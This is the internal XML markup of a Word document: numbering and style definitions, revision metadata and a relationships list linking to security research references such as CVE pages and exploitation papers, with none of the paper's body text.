      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4504" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BF584756">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5410" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="380EDC60">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6316" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F828CEB6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7222" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AF4095EC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8128" w:hanging="146"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="66DD71DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EB65356"/>
    <w:lvl w:ilvl="0" w:tplc="66A43820">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="160" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:w w:val="100"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6C149AA0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1138" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="57ACDEDE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2116" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9B84A2F6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3094" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4E8224E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4072" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C07CFDFA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5050" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F9F49686">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6028" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1980B1BC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7006" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F1DE51E0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7984" w:hanging="278"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="77652A00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1730F004"/>
    <w:lvl w:ilvl="0" w:tplc="678CDF72">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="100"/>
        <w:position w:val="2"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A48AB414">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:w w:val="100"/>
        <w:position w:val="2"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F5F8CD04">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2597" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C284D0E6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3515" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A552C81E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C9D69D88">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5351" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D6BCA1EA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6268" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="15E0833A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7186" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B740A040">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8104" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2"/>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宗泽 江">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="17ecc6b042f7e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02A"/>
    <w:rsid w:val="00024F73"/>
    <w:rsid w:val="000D3EB1"/>
    <w:rsid w:val="001C7552"/>
    <w:rsid w:val="0026102A"/>
    <w:rsid w:val="002924D5"/>
    <w:rsid w:val="00483896"/>
    <w:rsid w:val="004D275C"/>
    <w:rsid w:val="005C7515"/>
    <w:rsid w:val="005D386D"/>
    <w:rsid w:val="00691AB9"/>
    <w:rsid w:val="00762A93"/>
    <w:rsid w:val="0087509B"/>
    <w:rsid w:val="00A5797A"/>
    <w:rsid w:val="00EE4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DF1EE"/>
  <w15:docId w15:val="{9D640067-71B3-4325-83C4-B08BA6055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lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="160"/>
      <w:outlineLvl w:val="2"/>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880" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="171" w:lineRule="exact"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C7552"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C7552"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001C7552"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="a6"/>
    <w:next w:val="a6"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C7552"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a9">
    <w:name w:val="批注主题 字符"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001C7552"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C7552"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ab">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001C7552"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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18/08/relationships/commentsExtensible" Target="commentsExtensible.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/733.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phreedom.org/research/heap-feng-shui/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/%7Ehovav/papers/s07.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:yan@matasano.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.matasano.com/research/nerve/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=7056380" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249"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mailto:chris@matasano.com" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.matasano.com/research/ragweed/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.technet.com/b/srd/archive/2011/06/14/ms11-044-jit-compiler-issue-in-net-framework.aspx" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://em386.blogspot.com/2010/06/its-2010-and-your-browser-has-assembler.html" TargetMode="External"/><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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-376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log.llvm.org/2010/04/intro-to-llvm-mc-project.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://trailofbits.files.wordpress.com/2010/04/practical-rop.pdf" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mozilla.org/security/announce/2011/mfsa2011-22.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4868</Words>
  <Characters>27749</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>231</Lines>
  <Paragraphs>65</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>32552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Msk</dc:creator>
  <cp:lastModifiedBy>宗泽 江</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-05T07:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-05T07:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>